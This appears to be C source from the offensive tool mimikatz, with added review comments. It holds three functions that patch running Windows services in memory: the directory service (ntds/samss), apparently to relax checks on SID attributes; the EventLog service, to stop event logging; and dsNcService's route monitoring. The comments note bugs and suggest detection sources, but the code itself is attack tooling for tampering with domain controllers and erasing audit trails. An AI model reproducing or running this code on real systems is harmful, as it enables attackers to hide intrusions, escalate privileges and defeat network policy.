/*
 * Applies two patch reference tables to the directory service, in order.
 *
 * The target service and module are chosen from the running build number:
 * "samss" / "ntdsa.dll" below the Vista build threshold, "ntds" /
 * "ntdsai.dll" otherwise. LoopBackCheckReferences is applied first;
 * SysModReservedAttReferences is attempted only when the first call
 * reports success.
 *
 * argc and argv are not used. The function returns STATUS_SUCCESS on every
 * path, and the result of the second helper call is discarded, so a caller
 * cannot distinguish "both applied" from "first failed" or "second failed".
 *
 * NOTE(review): the table length passed here is sizeof(table), a byte
 * count, while the other callers in this file pass an element count
 * (ARRAYSIZE(...) or sizeof(table) / sizeof(KULL_M_PATCH_GENERIC)). If the
 * helper expects an element count, this over-states the table length and
 * the helper may read past the end of the table. Confirm against the
 * helper's prototype.
 *
 * NOTE(review): the helper's name suggests it modifies a running process or
 * service rather than a file on disk; if so, file-integrity checks on
 * ntdsa.dll / ntdsai.dll would not show the change, and detection has to
 * come from process-access telemetry on the hosting process and from
 * directory-change auditing. The meaning of the trailing TRUE argument is
 * not visible here.
 */
NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[])
{
	/* Evaluate the build comparison once and derive both names from it. */
	const int isPreVista = (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_VISTA);
	PCWSTR service = isPreVista ? L"samss" : L"ntds";
	PCWSTR lib = isPreVista ? L"ntdsa.dll" : L"ntdsai.dll";

	kprintf(L"Patch 1/2: ");
	if(!kull_m_patch_genericProcessOrServiceFromBuild(LoopBackCheckReferences, sizeof(LoopBackCheckReferences), service, lib, TRUE))
	{
		/* First table not applied: skip the second one, still report success. */
		return STATUS_SUCCESS;
	}

	kprintf(L"Patch 2/2: ");
	kull_m_patch_genericProcessOrServiceFromBuild(SysModReservedAttReferences, sizeof(SysModReservedAttReferences), service, lib, TRUE);

	return STATUS_SUCCESS;
}
/*
 * Applies the EventReferences patch table to the "EventLog" service.
 *
 * The module handed to the generic patch helper depends on the OS major
 * version: "eventlog.dll" when it is below 6, "wevtsvc.dll" otherwise.
 *
 * argc and argv are not used. The helper's result is ignored and
 * STATUS_SUCCESS is always returned, so the caller gets no indication of
 * whether the patch was applied.
 *
 * NOTE(review): the target is the Windows event logging service, so a host
 * where this has run may show gaps in its local event logs, presumably
 * without the service stopping. Local log continuity alone is therefore a
 * weak signal; process-access telemetry for the service's host process and
 * independently collected or forwarded logs are the more reliable sources.
 * The meaning of the trailing TRUE argument is not visible here.
 */
NTSTATUS kuhl_m_event_drop(int argc, wchar_t * argv[])
{
	const wchar_t *module;

	/* The event log service lives in a different DLL before version 6. */
	if(MIMIKATZ_NT_MAJOR_VERSION < 6)
	{
		module = L"eventlog.dll";
	}
	else
	{
		module = L"wevtsvc.dll";
	}

	kull_m_patch_genericProcessOrServiceFromBuild(EventReferences, ARRAYSIZE(EventReferences), L"EventLog", module, TRUE);

	return STATUS_SUCCESS;
}
/*
 * Applies the ncRouteMonitorReferences patch table to the service named
 * "dsNcService".
 *
 * The table length is passed as an element count
 * (sizeof(table) / sizeof(KULL_M_PATCH_GENERIC)). NULL is passed where the
 * other callers in this file name a module; how the helper interprets a
 * NULL module is not visible here.
 *
 * argc and argv are not used. The helper's result is ignored and
 * STATUS_SUCCESS is always returned.
 *
 * NOTE(review): judging by the table name, this presumably targets the
 * route-monitoring behaviour of that service. Confirm against the table's
 * definition. If so, a client whose routing policy is enforced by that
 * service should not be assumed to still be enforcing it merely because
 * the service is running.
 */
NTSTATUS kuhl_m_misc_ncroutemon(int argc, wchar_t * argv[])
{
	kull_m_patch_genericProcessOrServiceFromBuild(
		ncRouteMonitorReferences,
		sizeof(ncRouteMonitorReferences) / sizeof(KULL_M_PATCH_GENERIC),
		L"dsNcService",
		NULL,
		TRUE);

	return STATUS_SUCCESS;
}